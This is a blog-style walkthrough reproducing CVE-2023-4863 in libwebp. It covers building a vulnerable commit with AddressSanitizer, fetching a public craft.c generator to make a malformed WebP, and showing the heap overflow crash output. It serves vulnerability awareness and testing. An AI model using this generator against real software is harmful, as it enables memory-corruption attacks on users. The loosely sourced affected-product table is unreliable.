{% hint style="warning" %}
Use what I'm about to say in this article only for the right purposes, such as raising security awareness and improving the security posture of your environments. I do not accept any responsibility for other uses.
{% endhint %}
*WebP is an open-source image format developed by Google. WebP enables higher quality images in smaller file sizes. The libwebp package, released by Google, encodes and decodes images in WebP format and is used widely across the internet for lossless image compression.*
*The image parsing library libwebp is the core of the recently identified* [*CVE-2023-4863*](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) *heap buffer overflow vulnerability and zero-day exploit that **impacts Google Chrome and other Chromium-based browsers for Windows, macOS, and Linux, as well as any software or web application that uses the libwebp library.** (Source:*[*https://www.upguard.com/blog/libwebp-cve-2023*](https://www.upguard.com/blog/libwebp-cve-2023)*)*
***In Google Chrome, versions before*** ***116.0.5845.187*** and ***libwebp 1.3.2*** are affected by these vulnerabilities. Chromium security severity is Critical.
Since many applications use the webp library, many applications are affected by this vulnerability and the ***CVSS score is 8.8***. Here are some apps that may be affected.
| **Category** | **Products** |
| -------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
| **Web Browsers** | Google Chrome, Safari, Microsoft Edge, Mozilla Firefox, Tor, Beaker (web browser), GNOME Web, Midori, OhHai Browser, Pale Moon, SEOBrowse |
| **Social Media** | Discord, Facebook, Instagram, Linked, Pinterest, Reddit, Telegram, Twitter, WhatsApp, |
| **Video Platforms** | Lbry, Twitch, Vimeo, YouTube, YTMDesktop App |
| **Cloud Storage** | Amazon Photos, Dropbox, Google Drive, Google Photos |
| **Ecommerce** | Amazon, Ebay, Etsy, Shopify, WooCommerce |
| **CMS** | Drupal, Joomla, MediaWiki, WordPress |
| **Email Services** | Gmail |
| **Forum Software** | PHPBB, vBulletin, XenForo |
| **Photo Editing** | GDAL, GIMP, Graphic Converter, ImageMagick, Paint.NET, Photoshop, Photoshop and Picasa, Pixelmator, XnView |
| **Game Engines** | Godot Engine, Unreal Engine, Unity |
| **Desktop Software** | 1Password, Basecamp 3, Bitwarden, Blender, Cryptocat (discontinued), Discord, Discord RPC Maker, Electron App Store (Unofficial), Etcher, |
| **Web Servers** | Apache, IIS, nginx |
| **Major Companies** | Facebook, Google, Slack, Wikimedia, WordPress.com |
*(List source:* [*https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html*](https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html)*)*
So let's perform the POC of this vulnerability.
Let's download the libwebp library from Google source.
```bash
git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
```
Let's go to the ***webp\_test*** folder.
```bash
cd webp_test
```
Then, let's move on to the relevant commit.
```bash
git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
```
***Let's enable AddressSanitizer (ASan)***. This tool helps detect address corruption errors in C and C++ programs.
```bash
sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
```
Let's compile the ***makefile.unix*** file.
```bash
make -f makefile.unix
```
At this point you may encounter errors that some files are missing. I will show what I encountered in words and share the commands that will solve it.
Let's install ***libjpeg-dev***.
```bash
sudo apt-get install libjpeg-dev
```
Then install ***libpng-dev***
```bash
sudo apt-get install libpng-dev
```
Install the ***libtiff-dev.***
```bash
sudo apt-get install libtiff-dev
```
Then, compile the ***makefile.unix*** file again.
```bash
make -f makefile.unix
```
Then, go to the ***examples*** folder.
```bash
cd examples/
```
Let's download the C source code named ***craft.c***.
```bash
wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
```
Let's compile the C source code named craft.c. As a result of the compiled code, it will give us an output file named ***craft***.
```bash
gcc -o craft craft.c
```
Let's give the bad.webp image as input to the craft file.
```bash
./craft bad.webp
```
Then let's run our last command.
```bash
./dwebp bad.webp -o test.png
```
Heap buffer overflow occurs exactly at this stage.
The output shows us that the dwebp program encountered a heap buffer overflow. This means that the program is trying to write data to a memory location that it is not allowed to access. \
Our AddressSanitizer (ASan) debugger tool worked as we expected and informed us that heap buffer overflow had occurred.\
\&#xNAN;***The error occurs in the\*\*\*\* ****BuildHuffmanTable**** \*\*\*\*function, which is part of the WebP library.***
As we see in the error description, it occurs in the memory area at 0x626000002f28.
```arduino
==78508==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x5589e8fad35a bp 0x7fff95d4c400 sp 0x7fff95d4c3f0
```
In the section below, we see the function that triggered the error. That is, the ***BuildHuffmanTable*** function.
```javascript
#0 0x5589e8fad359 in BuildHuffmanTable (/home/ali/webp_test/examples/dwebp+0xb6359)
```
AddressSanitizer uses Shadow Bytes when doing this debugging. Shadow Bytes can basically be thought of as a copy of the real memory, and when an error occurs, AddressSanitizer works on shadow bytes and carries information about the values of the relevant address blocks in memory at the time the error occurred.
```
Shadow bytes around the buggy address:
0x0c4c7fff8590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c7fff85a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c7fff85b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c7fff85c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c7fff85d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4c7fff85e0: 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa
0x0c4c7fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c7fff8600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c7fff8610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c7fff8620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c7fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
```
### Sources
->\
->\
->[*https://www.upguard.com/blog/libwebp-cve-2023*](https://www.upguard.com/blog/libwebp-cve-2023)\
*->*[*https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html*](https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html)
